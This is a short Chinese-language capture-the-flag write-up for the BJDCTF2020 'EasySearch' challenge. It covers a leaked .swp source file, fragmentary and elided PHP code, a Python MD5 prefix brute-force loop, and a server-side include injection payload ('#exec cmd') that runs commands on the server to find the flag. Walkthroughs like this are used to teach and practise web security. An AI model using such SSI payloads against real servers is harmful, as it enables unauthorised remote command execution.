[BJDCTF2020]EasySearch

[BJDCTF2020]EasySearch_第1张图片
sql注入没回显,扫描一下后台,最后用御剑扫描到了index.php.swp

进去是一段源代码

alert('[+] Welcome to manage system')";
            $file_shtml = "public/".get_hash().".shtml";
            $shtml = fopen($file_shtml, "w") or die("Unable to open file!");
            $text = '
            ***
            ***
            

Hello,'.$_POST['username'].'

*** ***'; fwrite($shtml,$text); fclose($shtml); *** echo "[!] Header error ..."; } else { echo ""; }else { *** } *** ?>

[BJDCTF2020]EasySearch_第2张图片
这一段简单,用python跑出MD5加密前面是6d0bc1的密文

import hashlib

for i in range(1000000000):
    a = hashlib.md5(str(i).encode('utf-8')).hexdigest()

    if a[0:6] == '6d0bc1':
        print(i)
        print(a)

[BJDCTF2020]EasySearch_第3张图片

输入后抓包
在这里插入图片描述
发现隐藏了一个url,
[BJDCTF2020]EasySearch_第4张图片
进去之后是这样的,蒙圈了,看了web才知道,唉
根据他的后缀是shtml,搜索漏洞
并且他输出了用户名的名字

得知
ssi注入漏洞
漏洞参考文献
可以远程命令执行

看看他服务器是什么
在这里插入图片描述
flag并不在根目录下

payload:

<!--#exec cmd="ls ../"-->

查看下面的flag文件即可

你可能感兴趣的:([BJDCTF2020]EasySearch)